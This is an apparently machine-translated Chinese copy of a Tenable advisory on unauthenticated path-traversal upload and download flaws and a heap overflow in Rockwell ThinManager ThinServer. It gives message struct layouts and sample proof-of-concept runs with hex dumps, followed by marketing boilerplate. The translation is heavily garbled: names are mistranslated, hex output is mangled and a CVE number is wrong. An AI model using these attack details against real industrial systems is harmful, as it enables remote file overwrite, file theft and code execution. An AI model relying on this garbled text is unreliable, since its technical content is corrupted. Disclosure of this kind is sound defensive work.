脸书 Google+ 微博 LinkedIn YouTube系统 RSS系统 菜单类 搜索 资源-博客 资源-Webinar 资源-报表 资源-事件 图标#066 图标_067 图标_068 图标_069 图标070

Rockwell自动化 ThinManager ThinServer多重易变性

临界点

简表

Rockwell自动化ThinManager ThinServer.exe中存在多重漏洞

受影响版本 :
  • 6.x-10.x
  • 11.0-11.0
  • 11.1.0-11.1.5
  • 11.0-11.2.6
  • 12.0-12.0
  • 12.1.0-12.1.5
  • 13.0-13.0.1

CVE2023-27855-薄管理服务器路径轨迹上传

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

客户端消息发送到ThinServer.exe同步线程

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/msg类型bis/msg旗/0x0001-请求/0x0002-响应/0x800-贝32连/Msg体长structmsg{headerhdr字节数据//格式取决于hdr.类型}structmsg_7_35/hdr类型必须是7或35b32unk字符串文件名//取消字符串文件类型字符串unk字符串unk/sg35blen//bitte数
路径遍历处理7或35型消息时存在(通过文件_name字段处理)(SYNC_MSG_SEND_FILE)。非认证远程攻击者可利用它向磁盘驱动器中安装 ThinServer.exe的任何目录上传任意文件攻击者可用攻击者控制恶意内容覆盖现有可执行文件,可能导致远程代码执行

POC:

概念利用漏洞证明由Tenable研究生成下例输出POC对脆弱目标执行

示例输出
server_path_traversal_file上载
              
               f/tmp/malious_file_contents-n00000: 0040000008002893546B3F/tmp/malious_file_contents上传远程主机请检查文件上传
              

CVE2023-2785-ThinManager ThinServer路径轨迹下载

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

客户发送消息8结构如下:

struct msg_8/hdr类型必须是8b32unk字符串文件名//失效字符串};

路径遍历处理类型8消息非认证远程攻击者可利用它下载磁盘驱动器上任意文件,并安装 ThinServer.exe

POC:

概念利用漏洞证明由Tenable研究生成下例输出POC对脆弱目标执行

示例输出
ython3薄服务器_path_traversal_file_dload.
              
               windows/win.ini00000: 00400000000050682FA1BF3Fen00000000000500010:2E5C2E2E2E2E2E2E2E2E2E2E2E500020:5C2E2E5C57696E646F77735C\.s(可达4096字节)-0000000000000000005C.d.16位app00020:2073 75706F72740D0A5B666F6E7473支持0A5B6D63692065746E73.[mci扩展0D0A5B66696C65735D0D0A5D6169].
              

CVE-2023-27857-丁管理器高速缓冲溢出

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

堆积缓冲条件发生时msg_7_35.fle非认证远程攻击者可利用此漏洞:

  • 创建大数tmp文件C:\ programData\Rockwell软件\ ThinManager\tm
  • 将数据字段后内存内容写入tmp文件,通过利用漏洞下载2
  • Crash ThinServer.exe因阅读违规

POC:

概念利用漏洞证明由Tenable研究生成下例输出POC对脆弱目标执行

示例输出
ython3薄服务器sendfile
              
               连接2连接3连接4追踪(最近最后一次调用):文件 "/Work/0day/thinserver_sendfile_dos.py.
               
                s.connect((目标,端口))ConnectRefedError:[Errno111]Connect拒绝
               
              

重开丁Server.exe

ython3薄服务器_path_traversal_file_dload.
              
               serqdata/Rockwell软件ThinManager/tm/tpstallfile000000: 00400008000B84F6623Fen0000: 00080000005F 000A2E2E5C2E500010:2E5C2E2E2E2E2E2E2E2E2E2E2E00000020: 5C 2E 2E 5C 2E 2E 5C 5C  50 72 6F 67 72 61 6D 44  \..\..\\ProgramD 00000030: 61 74 61 5C 52 6F 63 6B  77 65 6C 6C 20 53 6F 66  ata\Rockwell Sof 00000040: 74 77 61 72 65 5C 54 68  69 6E 4D 61 6E 61 67 65  tware\ThinManage 00000050: 72 5C 74 6D 70 5C 74 6D  70 69 6E 73 74 61 6C 6C  r\tmp\tmpinstall 00000060: 66 69 6C 65 5F 30 00                              file_0.men00: 000000000000000004141414141414141AAAAAAAAAAAAAAAAAAAAAAA000207F00108FA20200001000000000000000000000000000000FC3080F00805C003F05C043000000000000000000000000000000000000000000000000000000000000000000000000.S.O.R.000C0:05005C546800690000000000640622D00720000086C3020FF9F090000000.snip.
              

求解

更新支持固定版

披露时间线

12/16/2022-向供应商发布问题
03/15/2023-供应商请求并获准延长6天披露

TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响

可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案

关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码

如有问题或更正,请发邮件[email protected]

风险信息

可租咨询ID
TRA2023-13
受影响产品
Rockwell ThinManager-ThinServerTM
风险因子
临界点

咨询时间线

03/21/2023咨询发布
04/05/2023-POC开发脚本应销售商请求编辑

可耐受脆弱性管理

前称Tenable.io


完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

试可穿Nessus专业免费

免费7天

TenableNessus是当今市场最全面的脆弱感扫描器

New-Nessus专家
现可用

奈苏斯专家增加更多特征,包括外部攻击表面扫描能力以及添加域和扫描云基础设施能力点击这里尝试Nessus专家

填表后继续使用NessusPro测试

可买Nessus专业

TenableNessus是当今市场最全面的脆弱感扫描器可租Nessus专业程序帮助脆弱性扫描自动化,在守法周期中省时并允许你加入IT团队

购买多年度许可证并保存添加高级支持访问电话、社区聊天支持全天365天全天24小时

选择您的许可

购买多年度许可证并保存

添加支持培训

tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

tenable.io 付费

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买

可租WebApp扫描试

前称Tenable.ioWeb应用扫描

完全存取最新网络应用扫描服务 设计现代应用安全扫描全在线组合漏洞高精度而不人工重创或干扰关键网络应用现在就签名

可租WebApp扫描实验中也包括可租易用性管理、可租可租鲁明和可租云安全

可租WebApp扫描

前称Tenable.ioWeb应用扫描

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

5 FQDNs

3 578美元

立即购买

试可腾鲁明

可视化并探索接触管理,跟踪随时间推移降低风险,并参照Tenablelumin对等基准

可点Lumin测试中也包括可点易点管理、可点WebApp扫描和可点云安全

可买路明

联系销售代表,看可租Lumin如何帮助你在整个组织中获取洞察力并管理网络风险

试可耐云安全

前称可租.cs

完全无障碍检测并修复云基础设施误配置并观察运行时漏洞注册免费测试了解更多试验过程点击这里

可租云安全测试中也包括可租易用性管理、可租可租鲁明和可租WebApp扫描

联系人a购买可租云安全

联系销售代表了解更多可耐云安全知识,并观察多易登录云账号并在分钟内为云误配置和漏洞获取可见度

试可耐奈苏斯专家免费

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

已经有TenableNessus专业
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

试Nessus免费专家

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

内索斯职业类
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

Baidu
map